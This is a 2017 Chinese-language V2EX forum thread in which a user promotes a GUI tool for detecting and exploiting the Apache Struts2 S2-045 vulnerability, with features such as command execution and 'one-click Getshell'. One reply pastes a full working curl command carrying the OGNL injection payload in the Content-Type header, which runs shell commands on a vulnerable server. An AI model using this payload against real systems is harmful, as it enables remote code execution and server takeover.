V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Flyshit
V2EX  ›  程序员

Struts2 S2-045 漏洞检测利用工具 Exp GUI 版

  •  
  •   Flyshit ·
    flyteas · 2017-03-08 00:09:16 +08:00 · 10997 次点击
    这是一个创建于 2821 天前的主题,其中的信息可能已经有所发展或是发生改变。

    刚刚看到这个漏洞这么火,顺手写了个简易版本的检测工具,带 GUI ,目前只支持命令执行 UI 翔一样就翔一样吧,控件起码对齐了 MFC 写的你怕不怕 各位表哥路过给点个 star 吧 :-)

    http://github.flyshit.pw/github.html

    第 1 条附言  ·  2017-03-08 01:06:20 +08:00
    已经添加 release 啦,拖下来就能用
    V2EX 怎么换行不对劲?
    第 2 条附言  ·  2017-03-09 21:26:07 +08:00
    更新版本啦,新版本功能包括
    命令执行
    网站根目录获取
    文件上传
    一键 Getshell
    14 条回复    2017-09-11 10:56:56 +08:00
    wjm2038
        1
    wjm2038  
       2017-03-08 00:21:33 +08:00 via Android
    已点 star
    azhw
        2
    azhw  
       2017-03-08 00:36:35 +08:00
    发布个二进制 release 会方便不少.
    SoloCompany
        3
    SoloCompany  
       2017-03-08 03:09:14 +08:00
    好丑的头像
    zhanghedr
        4
    zhanghedr  
       2017-03-08 04:28:06 +08:00
    可以可以
    paranoiagu
        5
    paranoiagu  
       2017-03-08 08:11:37 +08:00 via Android
    这个可以有
    graetdk
        6
    graetdk  
       2017-03-08 08:28:18 +08:00
    fatal error: 'SDKDDKVer.h' file not found
    fucker
        7
    fucker  
       2017-03-08 09:04:22 +08:00
    已 star ,昨天还在用 python 的 poc 检测
    thinkmore
        8
    thinkmore  
       2017-03-08 09:19:47 +08:00
    昨天紧急修复了这个漏洞
    mianju
        9
    mianju  
       2017-03-08 10:16:14 +08:00
    试了一下感觉还挺好玩的
    jason19659
        10
    jason19659  
       2017-03-08 15:24:33 +08:00
    Struts2 又爆漏洞。。。这玩意还是别用了吧
    lovelynn
        11
    lovelynn  
       2017-03-08 15:30:46 +08:00
    curl -H "Content-Type:%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" "url"‘
    所以你告诉我 gui 有何用
    Flyshit
        12
    Flyshit  
    OP
       2017-03-09 21:27:16 +08:00
    @fucker
    谢谢感谢~
    版本已经更新啦,新版本功能包括
    命令执行
    网站根目录获取
    文件上传
    一键 Getshell
    fucker
        13
    fucker  
       2017-03-10 08:30:46 +08:00
    @Flyshit 要是 wooyun 还在,这几天又可以看到表哥们刷 rank 了 :D
    shakespark
        14
    shakespark  
       2017-09-11 10:56:56 +08:00
    打不开了。。。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   4140 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 36ms · UTC 05:19 · PVG 13:19 · LAX 21:19 · JFK 00:19
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.